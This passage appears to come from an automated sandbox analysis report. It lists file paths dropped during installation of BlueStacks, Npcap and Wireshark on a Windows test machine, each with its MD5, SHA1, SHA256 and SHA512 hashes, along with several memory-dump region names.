| SHA512 | 7e9e0c3aabebd6f0c221918b6790d096824ee1c5f7338a21ac489952b8260b1e59be423005ce34bd5039cb38fa7c9197cf48b77974ed8f6b7ab2a2472e3daecf |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\gu.pak
| MD5 | e245057bea15117bed15bc3ee2911d74 |
| SHA1 | c8e2d5f85a974fa989c0d0f64121d2836a13bb84 |
| SHA256 | 4ea64678c7c551c2b2088b9417bcc76218822f3213e9b8028d618864035b97a5 |
| SHA512 | a72a1c259332f279f976403034c9d2356a437a1677c0e20c243f23ac246a8ab65bf150a610867687eef48a0b7c87d23f0e357ef21bb1791386790243803ee70f |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fa.pak
| MD5 | f913ea1db8c9c99bff701ceeaf8138f3 |
| SHA1 | 6bef3ff865b3a95dc1900ba3c94c5bf556c695a1 |
| SHA256 | b4e0d3f7cb858ce12b5a75a71ef14f2a36494cd4138181b29f6fb3d6bd386c4c |
| SHA512 | edca9b945c6dc90586f6d20e73316f620d5fff61f3ad4fd35c7e9064f55b1988cc77d372a97d100cbf572a2906cd193777a18ace98fabadea1604df42c8823a5 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\es-419.pak
| MD5 | f21b0783d062082ee46aa573eff68df0 |
| SHA1 | 84f62d15eb68858245e56bef0cf317e273918044 |
| SHA256 | 859cb8ad8666e97a47f0e24df4ae85aad80002fbf842b4e68afd0a308d6597fe |
| SHA512 | d87e2d51cedba8ba4eba3b0fd390bfb32b25c5cda98a0d6465b5ae351dc745a67ac174c223e7def8b02c9f00729244026e895791add2611680579dfec4b7b07b |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\en-US.pak
| MD5 | 1e958f35257ef1e2e5115d860602a593 |
| SHA1 | 688afb781ce3c4c9a55fee9696145260d2ce1400 |
| SHA256 | 4a65112f4d03cf38abf2ccff5e3fe8e161cb3e47d588b510504007c9bb876b37 |
| SHA512 | a996e8708f4e92794cf3eb6b7780d9ac8e567b1359aface4fd50d427630e4219678f4cdcd58764123ab6baf12a9c87a08b6ba5767fa8f6042a7319fb45b72a27 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\el.pak
| MD5 | 26afc001a706679413f5deaa3c6603e4 |
| SHA1 | c9d780d930775cfc17cf9160712a2e90ca55106e |
| SHA256 | 4c2a3552e84fdd08852073d25c99727c4270160260d159572715c7d37e5861bc |
| SHA512 | 743380b99f6d55ad892296e8361b74cf90254403fef15de37c3e5fc302bae2991f5bb4ae21ba84bddc30da3b5b31fb4e741b0c524feede1656bcd2d531d76ea1 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\de.pak
| MD5 | 01cc5b8a05a435482dc692baef032d3a |
| SHA1 | 229a4d1c9aea9111bb46895d096dfcaf488b8d4a |
| SHA256 | 53d5743a2606d6b553e8dbff871f2f1d3d53666baeb9ecca5b1ed624d48d5835 |
| SHA512 | 082654e8385811d4e0f35544c017704b0f13638f850947d76c9abe093333fdaf9d1d08c184bb8107d16b0eae6ebcbe0c522ed18138dcee30a71d9d75ea8c3488 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\da.pak
| MD5 | 5eba7377be8e34dd03db766300039ed2 |
| SHA1 | b3460fa050b93454b9e05586d86d7cf67881f557 |
| SHA256 | 94157ad608b35b29dd176a3106caa4613ed6d4c20268ce00ac4ccf13a9950f94 |
| SHA512 | 7d24210b60fe38b42fc6a4437ffb1e06333b7084025efe462b66e086cdee953254a1d6fec69ab3c8569118156f3a4a957aed5259e1432772ab46cf7905aa4385 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\bn.pak
| MD5 | 304432105fbe28b1625f0d7b6be3e7bf |
| SHA1 | 2d5474854bc0bca3f3ead1b9199d76ef533f0850 |
| SHA256 | ac282f17c5f25b55d368d06b305b89b614949d41c2a1377f1dd5aecb57d1ca8e |
| SHA512 | 8ab35cf2069f70a3a99dde98a7b7782821000abcefa97eaeb07b8a717d26a7b6c5461d5bcd39110b47db98aad9c56e463ca2707b7e6b71cda1092b8cf3a91ab8 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ar.pak
| MD5 | 143ffa8ca3ac0e6dca9a8b3e8ba3f3f5 |
| SHA1 | 6186940350b3fdd936f6ce41f3091bbca397e9a2 |
| SHA256 | 3f35466a80f4ca5a5167b2d3a3278e75afd90821206ac98801210a2117c913e2 |
| SHA512 | a12b5e3ae821e08aa76657cf84bd79def6f8fdb413e908b13944f6c2bc1aa9724193d0a9a0abd5dc0b87e0845d61b021d39024a5048443531dafa19de707944e |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\am.pak
| MD5 | 2a8ca8692a60fe8d33d51d99c9084a9d |
| SHA1 | 919d8adacce240fd394d6faf2aa41d2e5b8460ec |
| SHA256 | 73f0a7c7632313613814b3ccf5962962aff99de940e084e0b609ecbad1ec1d44 |
| SHA512 | 080e56cce041226592e7fa816fe8c5e362a1f172a8c671bda4092ff127f0cbe8238c40d41751099f6bac8f02c71faccc011df270b1c1bb8b772286ab95f5f1ea |
C:\Program Files\BlueStacks_nxt\resources\qtwebengine_resources_200p.pak
| MD5 | de5e6a97c80d698256369b10255ce45d |
| SHA1 | 8d4b979a8c2ee33c2dbc01ed13a165b455a5fdfc |
| SHA256 | 669f9d3388438377c440419e5c62973362e33e84a5b247ddd0dd4568da75eb13 |
| SHA512 | 5609ca5053f581e636c0fe10def704f076c7acf5d958e235991fec32a2ddebd72b312f36a6648d2462766d1cb141f3df12d39df1a344e0dfb4a9e2946dcf1206 |
C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json
| MD5 | b5a03fbea2c3d33b0ae7bceb5dfc6db2 |
| SHA1 | 6e517cdd11cd66c23ca62f6b983222df7301b987 |
| SHA256 | 4354b14b4c4913c21baf1788b18f2af2ea69d0536df9a81c3139de04bae03d72 |
| SHA512 | da16ec70ee1e37a21b41877b732d3bb71216d18b78cb5cdf3157656986d9417d4db2aad541adcea0b48d938297a5c40200e52352980a7ae83800990a3009e40f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1
| MD5 | 980046069eba5917dbf35ca3739ae5e2 |
| SHA1 | 1d1d96b93296ef7f6ff59371c612eac239fc7e7b |
| SHA256 | 61e9d12dfe01a49708831c75a14f0ac54c4a164de5d9877a931f04a1a6bd6214 |
| SHA512 | fce2b6e81a9060bf713fb6dadf6225c333d9e67dba7e2f0f665fafa20892b9bfb0fbf94ba0f14c752092041f20d1096d5dd2a184be45476e9094f789f30326bd |
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\InstallOptions.dll
| MD5 | d095b082b7c5ba4665d40d9c5042af6d |
| SHA1 | 2220277304af105ca6c56219f56f04e894b28d27 |
| SHA256 | b2091205e225fc07daf1101218c64ce62a4690cacac9c3d0644d12e93e4c213c |
| SHA512 | 61fb5cf84028437d8a63d0fda53d9fe0f521d8fe04e96853a5b7a22050c4c4fb5528ff0cdbb3ae6bc74a5033563fc417fc7537e4778227c9fd6633ae844c47d9 |
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\DonatePage.ini
| MD5 | 215fcfd443b817250d834a83fbd3490f |
| SHA1 | 7c8b27fb2524261649479278cbd72f7fef11a00b |
| SHA256 | 4988ff1b435fdffe6f96c1592cc31d039a75115dbd780f8dd1abe9382ca71c6e |
| SHA512 | 03911c975a8dc63e4dee02ffa7492dc67f4a8c2ee7c450e61bb4da202d42ccd16069b172be12127d8d9da1d75cf69d07182952c83fdc0e0665bd769a5a372ade |
C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\TransportSecurity
| MD5 | 93d6b5520e67ac200910c5fbef9b8168 |
| SHA1 | 769d7d62d06dff6513de69d17a38b9e659dec4ae |
| SHA256 | 7ca58dfd001e6f98cb93c647667d38aac3ad1dfaa1a078d2c6573fad5a019616 |
| SHA512 | cab0a12b9790d22b11fc874cc4303d7f3a8db2e276a9c493fe61a5873f0e2237206fc1489b4283e9a75e079e49ccbeccce08079f019345f042446eb1473a8101 |
C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\TransportSecurity~RFe66332c.TMP
| MD5 | 1ba4b9896b48fb3a13227944b6469e47 |
| SHA1 | 8bf4d207ee77fca3512c8d39d7e52ed8d9ce7503 |
| SHA256 | 2917d75d207f1c2c948f21fd443f4c765678215434e487342f1dce12bfbf1782 |
| SHA512 | 3aa6da4802c54deb51c8b0d205d50e4af56edc745d5dd779346b376af241c2bcc446fa078021e43b080814779db7731562cc09d330af73cba0fa215bffb5b7fe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c7df8caabbe738c6c63baf912a5297a3 |
| SHA1 | cae6be14c22f21d97cd376c1b43d9b5ad8dbc7fd |
| SHA256 | a3a2c1d109942e6866bedcf8f840eaf2d0890b59d7a6ea623c6eee94e3a25e0e |
| SHA512 | cc344fe13d699b4d58df829acb053dc3a3817785ddd05fb14e3c848275622d25110c445237f9ffba77f867a5587f7c44def26e9c3f16e62a543f3d6abd72c957 |
C:\Users\Admin\AppData\Local\Temp\3lvshmuz.hpv\BlueStacks-Installer_5.14.22.1003.log
| MD5 | 2041d6ab6a59ea8c8c7997205c4bf5d7 |
| SHA1 | 4565862aa2093d746f5e85ac1f02d11530cb5778 |
| SHA256 | e912f6e54168c00a457563104a95ea193a315f8c9607bc3f49ee369681d68648 |
| SHA512 | ee36261a366871574e5cd009a8f20595800e84706840fcebe71a61aeb9169547322d99e69c77a41ceaee4a6827bc23e1405bee57e624ea4949d45b495ba33df9 |
memory/688-22647-0x000000001CE00000-0x000000001CE08000-memory.dmp
memory/688-22648-0x0000000020AD0000-0x0000000020AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\NpcapPage.ini
| MD5 | 6d92cfc906fb0684194241de46130860 |
| SHA1 | f1b71ec77becf094746fc2b1e5c7b8a06f4c8568 |
| SHA256 | eca18a27265e0c02a715cd107848253f8b4dd95728090f3f05a2721201bfe8cb |
| SHA512 | 4128cffdb1f9a94c37e5e800772c0214399ac164b0a8b92071c7215d937f80853a39f14e9ebd759b50d85b96c96efcb3ffd25a17fcea63cd9293dcbcadfd9a96 |
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\USBPcapPage.ini
| MD5 | e99e395d6bfc37663626c4a01c732692 |
| SHA1 | 75813eb6682b97de44dafdd6f98afae7e4d3868b |
| SHA256 | b4c5e164a7dc968941eab553a3c0f53f3aae8209b8eef74d4be9838b78b51503 |
| SHA512 | e13cf96693c5d3971fdb5b14ee25e629b7016b045719f59d451789651127323b0a260f6c085f0b746b64d04a06a4d408aafc20eb71635d6064d8584af20973f6 |
C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.ba\logo.png
| MD5 | d6bd210f227442b3362493d046cea233 |
| SHA1 | ff286ac8370fc655aea0ef35e9cf0bfcb6d698de |
| SHA256 | 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef |
| SHA512 | 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b |
C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe
| MD5 | 35e545dac78234e4040a99cbb53000ac |
| SHA1 | ae674cc167601bd94e12d7ae190156e2c8913dc5 |
| SHA256 | 9a6c005e1a71e11617f87ede695af32baac8a2056f11031941df18b23c4eeba6 |
| SHA512 | bd984c20f59674d1c54ca19785f54f937f89661014573c5966e5f196f776ae38f1fc9a7f3b68c5bc9bf0784adc5c381f8083f2aecdef620965aeda9ecba504f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\e5bd37e9-9f1c-4b62-94f5-2bf7611f6c81.tmp
| MD5 | a36e9e4606a1a5ee16ea8104cf1a5c7b |
| SHA1 | e9fdbd0d5e058441e42da0a9443c10b08b4501a1 |
| SHA256 | 226522107a0e534d988a5cdff6b410f66d4f26b03ce28ea915041920f7f4047b |
| SHA512 | 12ed66f9f12dcbac9bdfa98c5ec58ee6d6abe8327cde11fdde47e838ad0dfc21ae37f48d0bea85d6aa126553e560e2de0433151f6a5d2dd3223850423f931ce7 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 4f3930e1505360e99a23398869ec89aa |
| SHA1 | b3f0818fde20fdad48970c29e67f079eff48c06c |
| SHA256 | bb5c7b0df52d93a8f3f2f4c98db0071199bcbdd33aa702ee6221c184638fb725 |
| SHA512 | a9ab87aacbde02eef61b0667294f73599f0c926d3956f43bd7db769b722c071eb7c514cb3f24ba88d567bb3e3c67319d736ee2bec6b335994c7a0cd39a1d6ed6 |
C:\Windows\Installer\e66ab1e.msi
| MD5 | a4075b745d8e506c48581c4a99ec78aa |
| SHA1 | 389e8b1dbeebdff749834b63ae06644c30feac84 |
| SHA256 | ee130110a29393dcbc7be1f26106d68b629afd2544b91e6caf3a50069a979b93 |
| SHA512 | 0b980f397972bfc55e30c06e6e98e07b474e963832b76cdb48717e6772d0348f99c79d91ea0b4944fe0181ad5d6701d9527e2ee62c14123f1f232c1da977cada |
C:\Config.Msi\e66ab11.rbs
| MD5 | 1c07d196cca09c41018644c3e414614e |
| SHA1 | b1efe939282843f0b5eb8b41d0dfbbab7d83d3b8 |
| SHA256 | 174446bad36fb607662ac1752ca0d09af7ccdab1efff685c8520d5cf72bcd4ee |
| SHA512 | de32dd0bc7dacafe77b6485291c057065a8b444cfed2b87801376b35ed51f4c4d8bc057ef37df64255408975ebb44ab1b10ec6633b04848e5694986b197ba951 |
C:\Config.Msi\e66ab1d.rbs
| MD5 | 52dac1ebb88f8c9cdf70dd9db6246b9e |
| SHA1 | f64df8503653893c96269899f9e76a55fae5145c |
| SHA256 | 992601c0a8e1a1cb7560d61880e4d8cbfd0390e4692860fe6e104c01fb624dc7 |
| SHA512 | 5ad713e2442a03af947e1974c9d452f5bbfd53fde468d0c81befffd229a19fe09681807836af2f95a1eabe1517d7090c2c4539d80cadd2452aa9d8c0a7ee52e0 |
C:\Config.Msi\e66ab24.rbs
| MD5 | a798f628663fe4846adba701fd66475a |
| SHA1 | e92a2dc469766ef0dc1045ae0b4ab13783960042 |
| SHA256 | 70b111d16d7148fe02374efab1edfd2eacc407a6d75bfda1a17d5107a711c424 |
| SHA512 | 9d506d812e58163175ff701db56deb49bb9aa980b1764ed747a5c7f2430ac454892241e721fae2ed9c59b9b87ec5dd0a652cc193a781717b90e96371d43ae18a |
C:\Config.Msi\e66ab33.rbs
| MD5 | 7d3c150c105f409a447433d93a402a34 |
| SHA1 | 69de1e02ac8913e82c39d7c432deb0c6f40aa412 |
| SHA256 | 7a89c77806e9d4f857f3e04fee2ff32ab5ff491dbb88f8d434bf6d4418e7968d |
| SHA512 | 8287adb0c1cd427394b5b13a54aadfd7520669a046ed59d5aee2159e40cf4e872e27cb31b6fa4c99a6b9b8ad5b5a24d19c36af0ea46a4328e82fae8e5d75e4b9 |
C:\Windows\Temp\{9FD00820-9D14-4590-865D-0A54217B3E88}\.ba\wixstdba.dll
| MD5 | eab9caf4277829abdf6223ec1efa0edd |
| SHA1 | 74862ecf349a9bedd32699f2a7a4e00b4727543d |
| SHA256 | a4efbdb2ce55788ffe92a244cb775efd475526ef5b61ad78de2bcdfaddac7041 |
| SHA512 | 45b15ade68e0a90ea7300aeb6dca9bc9e347a63dba5ce72a635957564d1bdf0b1584a5e34191916498850fc7b3b7ecfbcbfcb246b39dbf59d47f66bc825c6fd2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1f01a58f320a1bff2edc65e087e1b7a1 |
| SHA1 | a4e531452b7f7f14ae6eb97f1649f9b820a4c463 |
| SHA256 | 255469fa50590eda2cda88d0a86d36c53e9894a84779ac021d37f10ee0b6064b |
| SHA512 | ff9e7152e1a5f76f8a3a796f1e68130aa59f6ec71b8b3b65b744e379742155532f4c5d0e4d7b9266bfeb6810a7785004983236be28aa14622a9bd86fc98081a3 |
C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\InstallOptions.dll
| MD5 | 170c17ac80215d0a377b42557252ae10 |
| SHA1 | 4cbab6cc189d02170dd3ba7c25aa492031679411 |
| SHA256 | 61ea114d9d0cd1e884535095aa3527a6c28df55a4ecee733c8c398f50b84cc3d |
| SHA512 | 0fd65cad0fcaa98083c2021de3d6429e79978658809c62ae9e4ed630c016915ced36aa52f2f692986c3b600c92325e79fd6d757634e8e02d5e582ff03679163f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a486d12d1ce484a21264c855ca0ee76e |
| SHA1 | f800eb0a641e43d3b422dcea69a3f82faf0b264c |
| SHA256 | 07025b6049503e66f9063ee15b1ca25e0e61a964cd0a42ea459e36888de88d07 |
| SHA512 | 615a0367165dfda880db652d6940c1f9d33d203f276031fb3b6181c3c2c42965e286f254c4acf6a9ca97eda81dc046d586e843aeb1b1f886d4f5ffd3e7a66dd4 |
C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\options.ini
| MD5 | 4c03a565eafdd997f6d501d81e3ad3c9 |
| SHA1 | 1a8e728e164148dc08c4b24242721e6ecf515812 |
| SHA256 | 0f5a91ef783df6ea57ff35297d7a05f5cc6b38b04ff6f307eabb08be6484b43f |
| SHA512 | fd1c34b3f5ffe51fd91ee82ad68b131918724e6b0b4b19947c17ad169bf3cd1bcd37d6fea36afac817929a9f74c13a65b5e1736de83af65dfdcd895f002e229c |
C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\options.ini
| MD5 | dcc0f45027473dd400084b08c121550c |
| SHA1 | dc81d4ca0bf622313a1162e0b5910fb11af45e32 |
| SHA256 | 215cca1949bfa70606654a8d4b582d097773a01b6b464cf083b8a6361cf573f0 |
| SHA512 | 39680bb01a60dd1a064548303d0ce30d34afb59cc3b066b54c1491b05222cb270bac5cbcd357ceed60bfee4a41aef4f0e0fcb6fdb3cb3c0b0028e8acaed2e1a8 |
C:\Program Files\Npcap\NPFInstall.log
| MD5 | ffb779c5bc447cd08c56d54d83565660 |
| SHA1 | ef94eff7a6b5f0f668a44fa30365cdb56fff92f7 |
| SHA256 | 0a6ea38229234477614a2ffe99c7e70a4bfeb3118dd6dc1cbe1f4c8ea61ee35c |
| SHA512 | 9a9ee123b350af5390a1876ff9293473095033cedf01c5b9e558ac264ca498eefc82ce07737d5ef5b48e83b35cd071abc99c9267055b592e3a665ed4f625405a |
C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\nsExec.dll
| MD5 | f9e61a25016dcb49867477c1e71a704e |
| SHA1 | c01dc1fa7475e4812d158d6c00533410c597b5d9 |
| SHA256 | 274e53dc8c5ddc273a6f5683b71b882ef8917029e2eaf6c8dbee0c62d999225d |
| SHA512 | b4a6289ef9e761e29dd5362fecb1707c97d7cb3e160f4180036a96f2f904b2c64a075b5bf0fea4a3bb94dea97f3cfa0d057d3d6865c68da65fdcb9c3070c33d8 |
memory/2592-23978-0x0000000006110000-0x0000000006464000-memory.dmp
memory/2592-23979-0x0000000006640000-0x000000000668C000-memory.dmp
memory/2592-23980-0x0000000006B20000-0x0000000006B42000-memory.dmp
memory/2592-23981-0x0000000007DE0000-0x0000000008384000-memory.dmp
memory/2592-23982-0x00000000078E0000-0x000000000791E000-memory.dmp
memory/6092-23987-0x0000000005960000-0x0000000005CB4000-memory.dmp
C:\Program Files\Npcap\NPFInstall.log
| MD5 | 35ddebe59829d892b949e6cbd2bcdd32 |
| SHA1 | 58fecbd4010966be170ae26fa514470ed4fb4dbd |
| SHA256 | 2339704d6af0660833483a263dbe5378f9fea7e6a815d51137ba3c68c4406375 |
| SHA512 | fc64e878f089b6e8451d6a420110d8592f87a82cc85be1eabed7df62132be564e0fe3ed85e2194758efebf686cd471c798aab33bd061498f425b3218698a75bf |
C:\Program Files\Npcap\NPFInstall.log
| MD5 | 4ee73803764f107bdf43c7dea0d2cfd9 |
| SHA1 | f43a9c3560191c2eca8a0b4858694d65d4792da9 |
| SHA256 | 8cc6b90c2cd296a603fe9f812e46d0cd767d533301fbb2522ca0c92b220d7873 |
| SHA512 | 3aa908c32649e4b4aa76bc7e75df945bf3fdc8fc1e3c3e4bbb8e4e6a2c9f6a858579a217c43f7a546ef5a152cd44d84e22760c66aa077d5a62e3a9d8ce0f139d |
C:\Program Files\Npcap\NPFInstall.log
| MD5 | 8ffa46f69639b45cc96dcf82671e6925 |
| SHA1 | f74fb1884aa17b36bda1dad6bf9d5474575b97d9 |
| SHA256 | 1dfbfe36a71cdc54f244d878119f2bd7134e53b6712a3ad53cfa40b21bb430f3 |
| SHA512 | 6cf25a5c2692dcc77954d289229dace8df42936477f194a92f6f41a8ec87a37b1165dd74eed7fd76b8b3b93a1297d234798d6778dd9e1b0f84ae1f476ccacdf3 |
C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE393.tmp
| MD5 | 56fc763587dae7a34a6c39ebfa44a58f |
| SHA1 | ca5a73a1d59526e73809e13f2dc95a7738c36ad0 |
| SHA256 | 98abb948f100c7d47c80141a058c869eeca59c357e42c1fedd4cd44140617ca6 |
| SHA512 | 7bcd793d8b05b0c60c49a4cea34b7b885a0340f9ebee16f96051238306974bbdeed36d08bf83d88d64ae4fc7f37e8f7f7dbcae335bc5722269f8ea26954d7cfd |
C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE392.tmp
| MD5 | 16db6977ce750fa6cd3f9f7be93cc087 |
| SHA1 | b899075de2c186ec0fed298af470791025ab8fbc |
| SHA256 | 41c067a985f2770b9f1f38f0558d3661b333154e09022831de8a5acaf56c5b87 |
| SHA512 | b0941daba49451644293530a0a567d5621cab8b8e6a3a981da2a3079df21242529d3118fa9d2b956405e15319a0d690a4f37e9a6b8242ebe2b009a2d88ca63e6 |
C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE391.tmp
| MD5 | de72efb03052c07948619b29a991097f |
| SHA1 | 734b1c18a3f1d6367b274aca6aaa1c7af05c570f |
| SHA256 | 168e04bc04da8cc8fcd8e796682346efd5dc3a1fe7aeb6292b88b004405a25de |
| SHA512 | 11b16cd1e93b65a64c3ab03f15fdf789ee9b89cd2e04688238ad1584e8cdda49749b5ae772a54836cda05bba45097ca3863ece75a8ab3cb6a662541360040c24 |
C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\Network Persistent State
| MD5 | 77aba481be128d312351bc5bc5b86d79 |
| SHA1 | e0a06488bd899835cc3c1105be48f0d6bf7ea6a7 |
| SHA256 | 96994f9632d57fe655f9be0eba6da8eb3c12d1be791d03540ca7ba729a4acf3b |
| SHA512 | 26b96230474e83269137bd6a70ad6b6cec40de7bdebf01304fd28581e32612bde3c0e908bf693391c55b6ce398d1f72b4e36851d1d78a02ad2571de74885f0a2 |
C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\Network Persistent State~RFe66e834.TMP
| MD5 | 2800881c775077e1c4b6e06bf4676de4 |
| SHA1 | 2873631068c8b3b9495638c865915be822442c8b |
| SHA256 | 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974 |
| SHA512 | e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b |
C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\final.ini
| MD5 | cae757421db8d011e41266bfd9439885 |
| SHA1 | 7108a9f0740ee4e3a118f6ac9212e0446f074181 |
| SHA256 | ff350a68202aadb145f590c8579f9284d2e3c324b0369fde39e5a3a31d7b8204 |
| SHA512 | 785d19c796834065c823a7da99036378bba54b932ea1e47d4ba0c1d123a0a09ec307a3459fb862221de74ce61d9a8d7ec73901c9de007d31e7b39eb7a19b16b5 |
C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\System.dll
| MD5 | f020a8d9ede1fb2af3651ad6e0ac9cb1 |
| SHA1 | 341f9345d669432b2a51d107cbd101e8b82e37b1 |
| SHA256 | 7efe73a8d32ed1b01727ad4579e9eec49c9309f2cb7bf03c8afa80d70242d1c0 |
| SHA512 | 408fa5a797d3ff4b917bb4107771687004ba507a33cb5944b1cc3155e0372cb3e04a147f73852b9134f138ff709af3b0fb493cd8fa816c59e9f3d9b5649c68c4 |
C:\Program Files\Wireshark\Wireshark.exe
| MD5 | c122bd9e7b543d91715efee2bb840d46 |
| SHA1 | c93acabcb0c83d402c3f055d1299c73fe2741f5c |
| SHA256 | 7f1be9e3c1ded9704f4f2b7a580d96666d2182191f800eb5139c346bc41fb0b8 |
| SHA512 | ed09ce5c8bd001407ddec2dcbdb4e37ea3f234143942a3582b500404888012bcef2cfc224ec8273db0a5a2d0cc379d48b4955e1ce1b9b22d3a8229860a7f430c |
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\modern-wizard.bmp
| MD5 | cbe40fd2b1ec96daedc65da172d90022 |
| SHA1 | 366c216220aa4329dff6c485fd0e9b0f4f0a7944 |
| SHA256 | 3ad2dc318056d0a2024af1804ea741146cfc18cc404649a44610cbf8b2056cf2 |
| SHA512 | 62990cb16e37b6b4eff6ab03571c3a82dcaa21a1d393c3cb01d81f62287777fb0b4b27f8852b5fa71bc975feab5baa486d33f2c58660210e115de7e2bd34ea63 |
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\System.dll
| MD5 | 4add245d4ba34b04f213409bfe504c07 |
| SHA1 | ef756d6581d70e87d58cc4982e3f4d18e0ea5b09 |
| SHA256 | 9111099efe9d5c9b391dc132b2faf0a3851a760d4106d5368e30ac744eb42706 |
| SHA512 | 1bd260cabe5ea3cefbbc675162f30092ab157893510f45a1b571489e03ebb2903c55f64f89812754d3fe03c8f10012b8078d1261a7e73ac1f87c82f714bce03d |
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\nsDialogs.dll
| MD5 | 1d8f01a83ddd259bc339902c1d33c8f1 |
| SHA1 | 9f7806af462c94c39e2ec6cc9c7ad05c44eba04e |
| SHA256 | 4b7d17da290f41ebe244827cc295ce7e580da2f7e9f7cc3efc1abc6898e3c9ed |
| SHA512 | 28bf647374b4b500a0f3dbced70c2b256f93940e2b39160512e6e486ac31d1d90945acecef578f61b0a501f27c7106b6ffc3deab2ec3bfb3d9af24c9449a1567 |
C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\NpcapPage.ini
| MD5 | a9fc79cc765ac0933fcf8d3d983c6cd7 |
| SHA1 | ac43e6ee6ec12de89cba4795f540c964d44e7a90 |
| SHA256 | e7c6838d5677f428df10c103efcd7b64cae68505045298fe98d84b18cd21b22a |
| SHA512 | aaccc6e7b804f8229e64aa0dbd5362bdf3e7cf6560c6fcc018564826a2cc835d8cecf086d5c3a401a1373dbefcb520068e1402367381827ad65b8be8f413fa5e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fbbc3b076556d40d_0
| MD5 | 39e4f2100b891eb46f25ab9974294bdc |
| SHA1 | 109c9e6b381410b3906c2c99d579d63928244356 |
| SHA256 | 002827c7db2af306bb9d538c4de5c2d961f00e3dffd9335ca617af051523bcb5 |
| SHA512 | 2c3082c9340469465d42fc8c358dce79d6dbd67ee9fa9439d030ba35b09181e1c0bbf2a77fedf7daea1fa0871d6a700c43cc80308f188f641f914526248b07be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\635e64b37935c888_0
| MD5 | 510a5c6625dce5d259526a9229fe9546 |
| SHA1 | 7f49ad57cf364b9584eabe90b6eebb38f8ba537f |
| SHA256 | a9436a36c93b5b58144a84d4aee9588a300c8ebfc1b852e8a14b51652eb32da0 |
| SHA512 | febdb320991258dd23cd58c88449b4d1e4424dab3c420d2a6cbbcb53c5a7d526a5f778a67b317280092385670f4a32332d19a493c15c718eecf63a7f39021e51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\62f20db8aae8f96d_0
| MD5 | 7cb61e9f0873ad458576cc3304eaa886 |
| SHA1 | 0abfe4bd5a44122f96cb963968a1851cc0d860cb |
| SHA256 | 0f1644e840325b95ecdcd9199144f83bd8e3109cb034777fc633a566c86d2806 |
| SHA512 | daaf367deb8768afd8e6422132b64a187eeb57c2c21abd1945f0de10ed22e597068210982b411030415053907473bb92d8b8f5ad9df4383cc00caec7853a7a9a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\87bfea9426cb2ef3_0
| MD5 | 3b4c98b44ec1848d81834b61945bc501 |
| SHA1 | 08484a173d87defa74937f085717e0c97a949c87 |
| SHA256 | 8aa2dad7f175b534436086374dd33da3eabbe26b29365d9e95f7438b1ed54436 |
| SHA512 | 7d0ffca64c66d7f9a6a7c71c7251d2e0942511403bc32917ae555b0b5d3bc97598fc1f9a344d9a6078e1e03394e834a6e0a986d29733c1997f3cbc083faebefa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5de9f44e801f6134_0
| MD5 | 55b2dcb252cd21e73515f6ef56399f0f |
| SHA1 | 05e201041e5641710d315918fc8d71735e473eef |
| SHA256 | fe9ea75f1d8c7def62a5c0f89457543d2df6cfad973d1041486bbeed1d58de80 |
